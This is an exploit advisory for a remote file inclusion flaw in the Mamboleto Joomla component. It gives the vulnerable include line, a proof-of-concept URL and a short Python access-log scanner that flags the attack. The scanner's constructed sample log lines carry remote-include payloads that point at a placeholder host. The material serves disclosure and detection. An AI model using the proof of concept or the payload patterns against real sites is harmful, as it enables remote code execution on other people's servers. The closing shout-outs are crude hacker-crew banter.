/**************************************************************************
[!] Mamboleto Joomla! component Remote File Include Vulnerability
[!] Author : Don Takaci (root@dalnetwork.org)
[!] Homepage : http://www.dalnetwork.org
[!] Date : April 27, 2011
[!] Tune In : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] New Mamboleto 2.0 RC3 for Joomla! 1.5.x in "legacy mode".
Much improved, with two additional banks (Sicredi and Bancoob) and a new VirtueMart integration module.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down
===========================================================================
[ Vulnerable File ]
[+] mamboleto.php
Line 123
include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');
[ Proof of Concept ]
http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]
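[ Detection example ]
Added example, not part of the original advisory: a web access log check for requests that pass mosConfig_absolute_path to com_mamboleto, as the proof of concept above does. The function names, log lines, addresses and the files.example host are constructed for illustration; the request path is copied as printed in the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter named in the advisory; a legitimate client never sends it.
PARAM = "mosconfig_absolute_path"
# Any stream-wrapper style value (http://, ftp://, php://, data:) makes the include remote.
WRAPPER = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if "com_mamboleto" not in decode(target.path).lower():
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if decode(name).lower() == PARAM:
            return "remote-include" if WRAPPER.match(decode(value)) else "param-override"
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

# Constructed sample entries (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2011:15:40:01 +0000] "GET /index.php?option=com_mamboleto HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Apr/2011:15:41:12 +0000] "GET /acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=http://files.example/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [27/Apr/2011:15:41:30 +0000] "GET /acomponents/com_mamboleto/mamboleto.php?mosConfig%5Fabsolute%5Fpath=http%3A%2F%2Ffiles.example%2Fx.txt HTTP/1.1" 200 312',
    '203.0.113.5 - - [27/Apr/2011:15:42:02 +0000] "GET /acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=/var/www HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Any hit is worth triage: the parameter has no legitimate reason to appear in a request, whatever its value.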
===========================================================================
[ Who The Hell Has Control of That Damn Smoke Machine ]
[~] DALNETWORK TEAM – TULUNGAGUNGCYBER CREW – MainHack Brotherhood – ServerIsDown
[~] Thank you to ALL OF YOU who called me a piece of shit, especially my high school friends
[ rm -rf yourself ]
[>] FOR MALINGSIAL
[ some quotes ]
[+] Takaci- says : why so serious ?
[+] RAFLY says : watch out, there's a handyman =))
[+] s3v4 says : Collect Coins for KaKuNg !!!
[+] jepanx says : Okay then, if th… th… th… that's how it is :D
[+] KiLo says : Don't eat it pleaseeeeee!!!
[+] AR_GA says : I'm not a HOMO <++++ That's slander, he just won't admit it :p